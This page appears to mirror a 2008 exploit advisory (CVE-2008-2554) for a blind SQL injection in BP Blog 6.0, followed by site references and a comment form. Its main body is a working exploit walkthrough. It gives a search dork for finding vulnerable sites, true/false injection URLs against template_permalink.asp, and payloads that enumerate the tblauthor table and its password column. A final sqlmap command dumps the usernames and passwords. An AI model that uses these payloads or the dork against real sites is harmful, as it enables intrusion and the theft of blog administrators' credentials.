BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability

2008.06.07

Credit: JosS, Jose Luis Gngora Fernndez

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-2554

CWE: CWE-89

Dork: \"Powered by bp blog 6.0\"

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability
JosS, Jose Luis Gngora Fernndez
Spanish Hackers Team
www.spanish-hackers.com
[+] Info:
[~] Software: bp blog
[~] HomePage: http://blog.betaparticle.com/
[~] Exploit: Blind SQL Injection [High]
[~] Vuln file: template_permalink.asp
[~] Vuln file2: template_archives_cat.asp
[~] template_permalink.asp?id=[blind]
[~] template_archives_cat.asp?cat=[blind]
[~] Bug found by JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] EspSeC & Hack0wn!.
[~] Dork: "Powered by bp blog 6.0"
[+] Compression:
[~] True: http://localhost/[path]/template_permalink.asp?id=78 and 1=1
[~] False: http://localhost/[path]/template_permalink.asp?id=78 and 1=2
[+] Exploding:
[*] Checking table:
[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM tblauthor) >= 0
[~] Example2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from tblauthor)
[~] If you don't see any error, it is that table exist.
[*] Checking columns number of table:
[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM tblauthor) = 1
[~] If you don't see any error, the table has 1 columns.
[*] Checking columns of table:
[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(fldauthorpassword) FROM tblauthor) >= 0
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(fldauthorusername) FROM tblauthor) >= 0
[~] If you don't see any error, the column exists.
[*] User and password:
[~] Exploit: ./sqlmap.py -u "URL" -p rid -a "./txt/user-agents.txt" -v1 --string "text" -e "sql query"
[~] Example: ./sqlmap.py -u "http://../template_permalink.asp?id=78" -p id -a "./txt/user-agents.txt" -v1 --string "bp blog" -e "<SELECT concat(fldauthorusername,0x3a,fldauthorpassword) from tblauthor where 1=1>"
_EOF_

References:

http://www.securityfocus.com/bid/29460

http://www.securityfocus.com/archive/1/archive/1/492902/100/0/threaded

http://www.milw0rm.com/exploits/5705

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability

Dork: \"Powered by bp blog 6.0\"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.